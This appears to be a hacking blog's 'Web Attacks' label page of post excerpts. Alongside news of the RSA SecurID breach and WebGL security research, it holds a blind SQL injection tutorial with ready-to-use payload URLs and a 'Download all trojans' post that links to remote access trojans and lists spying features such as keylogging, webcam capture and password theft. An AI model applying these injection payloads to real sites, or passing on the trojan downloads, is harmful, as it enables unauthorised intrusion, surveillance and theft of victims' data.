Posts

Showing posts with the label Web Attacks

WebGL - A New Dimension for Browser Exploitation

WebGL flaws put Chrome and Firefox users at serious risk. WebGL is a new web standard for browsers which aims to bring 3D graphics to any page on the internet. It has recently been enabled by default in Firefox 4 and Google Chrome, and can be turned on in the latest builds of Safari. Context has an ongoing interest in researching new areas affecting the security landscape, especially when it could have a significant impact on our clients. We found that: A number of serious security issues have been identified with the specification and implementations of WebGL (Graphics Library). These issues can allow an attacker to provide malicious code via a web browser which allows attacks on the GPU and graphics drivers. These attacks on the GPU via WebGL can render the entire machine unusable. Additionally, there are other dangers with WebGL that put users’ data, privacy and security at risk. These issues are inherent to the WebGL specification and would require significant arc...

RSA hacked, SecurID users possibly affected

RSA hacked, users affected. In an open letter, Art Coviello, the executive chairman of RSA (the security division of EMC), made public the fact that the company has suffered a breach and data loss following an "extremely sophisticated cyber attack." Categorizing the attack as an Advanced Persistent Threat - a term that is often associated with corporate espionage and state-sponsored attacks - he said that their investigation revealed that the information extracted from the company systems is related to its SecurID two-factor authentication products, which are widely used by government agencies, private companies and other large organizations to add an additional layer of security for when employees log into their companies' networks. "While at this time we are confident that the information extracted does not enable a successful direct attack on any of our RSA SecurID customers, this information could potentially be used to reduce the effe...

Facebook Sql injection

Injection Include:

Blind SQL Injection tutorial

Let's start with advanced stuff. I will be using our example
http://www.site.com/news.php?id=5
When we execute this, we see some page and articles on that page, pictures, etc. Then, when we want to test it for a blind SQL injection attack:
http://www.site.com/news.php?id=5 and 1=1 <--- this is always true and the page loads normally, that's OK.
Now the real test:
http://www.site.com/news.php?id=5 and 1=2 <--- this is false, so if some text, picture or some content is missing on the returned page, then that site is vulnerable to blind SQL injection.
1) Get the MySQL version. To get the version in a blind attack we use substring, i.e.
http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4
This should return TRUE if the version of MySQL is 4. Replace 4 with 5, and if query return TRUE then th...

Download all trojans

Spy-Net [RAT] v1.7 Download : http://www.mediafire.com/?5sqm3s5uwfsfllj Nuclear RAT 2.1.0 * Programmed by: Caesar2k * Date added / updated: September 4th 2007 * Downloads : 80685 * File size: 1.26MB * Coded in: Delphi * Section: Remote Administration Tools & Spy * Compatibility: Windows NT, 2K, XP, Vista Download : http://www.nuclearwintercrew.com/Products-View/21/Nuclear_RAT_2.1.0/ Turkojan 4 Features : * Reverse Connection * Remote Desktop(very fast) * Webcam Streaming (very fast) * Audio Streaming * Thumbnail viewer * Remote passwords * MSN Sniffer * Remote Shell * Web-Site Blocking * Chat with server * Send fake messages * Advanced file manager * Zipping files&folders * Find files * Change remote screen resolution * Mouse manager * Information about remote computer * Clipboard manager * IE options * Running Process * Service Manager * Keyboard Manager * Online keylogger * Off...

SQL injection attack

The Target Intranet: This appeared to be an entirely custom application, and we had no prior knowledge of the application nor access to the source code: this was a "blind" attack. A bit of poking showed that this server ran Microsoft's IIS 6 along with ASP.NET, and this suggested that the database was Microsoft's SQL server: we believe that these techniques can apply to nearly any web application backed by any SQL server. The login page had a traditional username-and-password form, but also an email-me-my-password link; the latter proved to be the downfall of the whole system. When entering an email address, the system presumably looked in the user database for that email address, and mailed something to that address. Since my email address is not found, it wasn't going to send me anything. So the first test in any SQL-ish form is to enter a single quote as part of the data: the intention is to see if they construct an SQL...